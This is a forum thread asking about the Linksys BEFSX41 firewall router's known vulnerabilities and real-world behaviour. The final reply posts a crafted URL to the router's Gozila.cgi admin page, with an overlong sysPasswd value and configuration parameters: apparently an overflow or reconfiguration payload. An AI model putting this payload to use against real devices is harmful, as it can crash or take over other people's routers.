Router/Firewall
Page 1 of 2 12 LastLast

Thread: Router/Firewall

BS, EnCE, ACE, Cellebrite 11001001's Avatar
    Just West of Beantown, though nobody from Beantown actually calls it "Beantown."

Router/Firewall

Hey everyone-

My co-worker just picked up a
    "Linksys: BEFSX41 - Instant Broadband™EtherFast®Cable/DSL Firewall Router "
    and asked me about it.

I told him I have no experience with it, and I'd try and get some opinions of people who have had experience with it.

So, can anyone tell me about their experiences with this router/firewall?

Such as known vulnerabilities/exploits, what he needs to worry about, and if there really is a difference between this and a software router?

Thanks!
    That's Officer 11001001 to you...
    Now you see me | Now you don't
    "Relax, Bender; It was just a dream. There's no such thing as two." ~ Fry
    sometimes my computer goes down on me

I should think Linksys' knowledgebase articles that apply to that model of modem would be a good place to start looking for vulnerabilities and technical issues.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

Just West of Beantown, though nobody from Beantown actually calls it "Beantown."
    Thanks for the link, chsh.

But I guess I wasn't clear. I was looking for some insight from people who've had practical experience with it, and what those experiences were.

Here's some practical experience, try going here

Code:
    http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    &sysPasswdConfirm=AAAAAAAA
    &UPnP_Work=1&FactoryDefaults=0